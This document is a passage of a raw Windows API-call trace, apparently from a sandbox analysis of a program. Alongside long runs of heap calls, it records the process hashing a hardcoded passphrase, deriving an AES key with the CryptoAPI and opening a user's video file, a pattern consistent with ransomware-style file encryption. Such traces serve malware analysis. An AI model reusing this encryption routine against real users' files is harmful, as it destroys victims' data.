lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0105.347] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d3920 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0105.348] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0105.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0105.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0105.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0105.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0105.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0105.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0105.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0105.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0105.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0105.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0105.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0105.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0105.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0105.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0105.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0105.349] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0105.349] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0105.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca838, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0105.350] CloseHandle (hObject=0x258) returned 1 [0105.350] FreeLibrary (hLibModule=0x772d0000) returned 1 [0105.350] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0105.350] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\C98TxuIy1khtVyZ_cTR.avi", lpFindFileData=0x144e3c8 | out: lpFindFileData=0x144e3c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x55aa7690, ftCreationTime.dwHighDateTime=0x1d5ea91, ftLastAccessTime.dwLowDateTime=0xd1eca410, ftLastAccessTime.dwHighDateTime=0x1d5f0d3, ftLastWriteTime.dwLowDateTime=0xd1eca410, ftLastWriteTime.dwHighDateTime=0x1d5f0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd0cb, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="C98TxuIy1khtVyZ_cTR.avi", cAlternateFileName="C98TXU~1.AVI")) returned 0x41ac140 [0105.350] FindClose (in: hFindFile=0x41ac140 | out: hFindFile=0x41ac140) returned 1 [0105.350] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0105.350] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0105.350] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0105.350] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.350] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0105.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797028, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0105.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0105.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ea8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0105.351] CryptAcquireContextA (in: phProv=0x144e0a8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e0a8*=0x41a5250) returned 1 [0105.352] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0105.352] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0105.352] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0105.352] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0105.352] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0105.352] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0105.352] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.353] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0105.353] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0105.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43cafd0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0105.353] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144de18 | out: phHash=0x144de18) returned 1 [0105.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0105.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0105.353] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0105.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0105.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0105.353] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.353] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0105.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43caf58, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0105.353] CryptHashData (hHash=0x41ac200, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0105.353] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.353] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0105.353] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0105.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cadd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0105.353] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac200, dwFlags=0x1, phKey=0x144de18 | out: phKey=0x144de18*=0x41ac140) returned 1 [0105.354] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0105.354] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0105.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0105.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0105.354] CryptDestroyHash (hHash=0x41ac200) returned 1 [0105.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0105.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0105.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0105.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0105.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0105.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0105.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0105.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0105.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0105.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0a8 [0105.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0105.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0105.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0105.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0105.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0105.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0105.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0105.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0105.354] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0105.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0105.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0105.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0105.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0105.355] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac040 | out: hHeap=0x1780000) returned 1 [0105.355] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0105.355] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0105.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0105.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0105.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0105.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0105.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0105.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0105.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0105.355] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0105.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0105.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0105.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0105.355] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0105.355] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\C98TxuIy1khtVyZ_cTR.avi" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\c98txuiy1khtvyz_ctr.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0105.356] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0105.356] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e550 | out: lpNewFilePointer=0x0) returned 1 [0105.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0105.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0105.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0105.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0105.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0105.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0105.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0105.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0105.356] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0105.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0105.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0105.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0105.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0105.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0105.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0105.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0105.356] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0105.356] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.356] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0105.357] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0105.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a30 [0105.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0105.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0105.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0105.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0105.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0105.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0105.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0105.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0105.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0105.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0105.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0105.357] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0105.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0105.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0105.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0105.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0105.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0105.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0105.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0105.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0105.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0105.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0105.357] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0105.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0105.358] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0105.358] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0105.358] RtlAllocateHeap 